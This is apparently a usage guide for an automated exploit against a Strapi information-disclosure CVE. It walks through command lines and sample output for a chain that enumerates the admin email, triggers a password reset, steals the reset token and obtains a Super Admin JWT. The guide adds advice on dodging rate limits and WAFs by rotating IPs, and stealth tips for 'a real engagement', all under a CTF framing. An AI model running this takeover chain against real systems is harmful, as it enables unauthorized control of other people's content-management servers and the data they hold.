Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Strapi CVE-2026-27886

## https://sploitus.com/exploit?id=F138AC00-6A8B-5A86-B910-839244A18944
# CVE-2026-27886 Automated Exploit - Usage Guide

## What This Script Does

Automates the full account takeover chain in 4 HTTP request groups:

1. **Vulnerability Verification** - Confirms the target is vulnerable
2. **Email Enumeration** - Extracts admin email via boolean oracle (~500 requests)
3. **Password Reset Trigger** - Initiates Strapi's password recovery flow
4. **Token Exfiltration** - Steals the 40-char reset token (~320 requests)
5. **Account Takeover** - Uses stolen token to get Super Admin JWT

## Basic Usage

### Verify-Only Mode (Safe)
Check if target is vulnerable without exploitation:
```bash
./cve-2026-27886-exploit.py https://target/api/articles --verify-only
```

### Full Exploit (Quickest)
Automate everything if you don't know the admin email:
```bash
./cve-2026-27886-exploit.py https://target/api/articles
```

**Output:**
```
[+] Target: https://target/api/articles
[+] Base URL: https://target
[*] Verifying vulnerability...
    [+] Vulnerable: baseline=12, where_test=0
[*] Enumerating admin email...
    admin@example.com
[*] Triggering password reset for admin@example.com...
    [+] Password reset triggered (HTTP 204)
[*] Extracting 40-char reset token...
    [100%] d1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a
[*] Resetting password with stolen token...
    [+] Password reset successful!
    [+] JWT: eyJhbGciOiJIUzI1NiIs...
    [+] User: admin@example.com (ID: 1)

[+] SUCCESS! Admin account compromised.
[+] JWT Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
```

### Skip Email Enumeration (Faster)
If you already know the admin email (saves ~500 requests):
```bash
./cve-2026-27886-exploit.py https://target/api/articles \
  --email admin@example.com
```

### Custom Password
Set a custom password instead of default:
```bash
./cve-2026-27886-exploit.py https://target/api/articles \
  --email admin@example.com \
  --password "MyPassword123!"
```

### Add Delays (Avoid Rate Limits)
If the target has rate limiting:
```bash
./cve-2026-27886-exploit.py https://target/api/articles \
  --delay 0.1
```

This adds 100ms between each request (~2-3 minutes for full exploitation).

### Explicit Base URL
If `/admin/*` endpoints are on a different host:
```bash
./cve-2026-27886-exploit.py https://api.target/articles \
  --base-url https://admin.target
```

## CTF Scenarios

### Scenario 1: You Have Nothing, Need Everything
```bash
./cve-2026-27886-exploit.py https://ctf-challenge/api/posts
```
✅ Enumerates email, triggers reset, steals token, gets JWT

### Scenario 2: You Have the Admin Email
```bash
./cve-2026-27886-exploit.py https://ctf-challenge/api/posts \
  --email admin@ctf-challenge.local
```
✅ Skips email enumeration, saves ~2 minutes

### Scenario 3: Target Has Rate Limiting
```bash
./cve-2026-27886-exploit.py https://ctf-challenge/api/posts \
  --delay 0.05 \
  --email admin@ctf-challenge.local
```
✅ Slower but avoids triggering WAF/rate limits

### Scenario 4: Find the Flag Endpoint
After getting JWT, explore `/admin/*`:
```bash
# Use the JWT in subsequent requests
curl -H "Authorization: Bearer " \
  https://ctf-challenge/admin/content-manager/collection-types/admin::user/1

# Or look for custom endpoints
curl -H "Authorization: Bearer " \
  https://ctf-challenge/admin/settings

# Or check database access
curl -H "Authorization: Bearer " \
  https://ctf-challenge/admin/database-config
```

## What the Output Tells You

| Output | Meaning |
|--------|---------|
| `[+] Vulnerable: baseline=12, where_test=0` | Target is vulnerable; 12 rows in collection |
| `admin@example.com` | Enumerated admin email |
| `[+] Password reset triggered (HTTP 204)` | Reset token created on server |
| `[100%] d1a2...` | Token extraction complete (40 hex chars) |
| `[+] JWT: eyJ...` | Account takeover successful! |
| `[-] Not vulnerable: baseline=12, where_test=12` | Target is patched (5.37.0+) |
| `[-] Failed to enumerate email` | Collection may be empty or email unreachable |

## Common Issues

### "Non-JSON response"
- Wrong endpoint (not a Strapi Content API collection)
- Try: `https://target/api/products`, `https://target/api/articles`, etc.

### "Failed to enumerate email"
- Collection is empty (no `updated_by_id` foreign keys)
- Admin role doesn't match anyone in the database
- Try a different endpoint if multiple exist

### "Failed to extract reset token"
- Password reset wasn't triggered
- Different admin email than guessed
- Token expired (try again, it lasts ~24 hours by default)

### Getting rate-limited
- Add `--delay 0.05` or higher
- Or use a VPN/proxy to rotate IP addresses

## Security Notes

This script:
- ✅ Only makes GET/POST requests (no data modification)
- ✅ Targets only the vulnerable Strapi query parameter bypass
- ✅ Uses Strapi's legitimate password reset endpoints
- ✅ Leaves no stored artifacts on the target
- ⚠️ **IS LOUD** - Makes 800+ requests in sequence (obvious in logs)

For stealth in a real engagement, add delays and spread across multiple collection endpoints.

## Proving Your Friends Wrong

Run this when they're watching:

```bash
echo "[*] Starting automated Strapi account takeover..."
time ./cve-2026-27886-exploit.py https://ctf-challenge/api/articles

# They'll see:
# - Email auto-discovered
# - Token auto-extracted
# - Admin account taken over in ~5 minutes
# - Full JWT printed
#
# Drop the mic 🎤
```

Good luck in your CTF! 🚩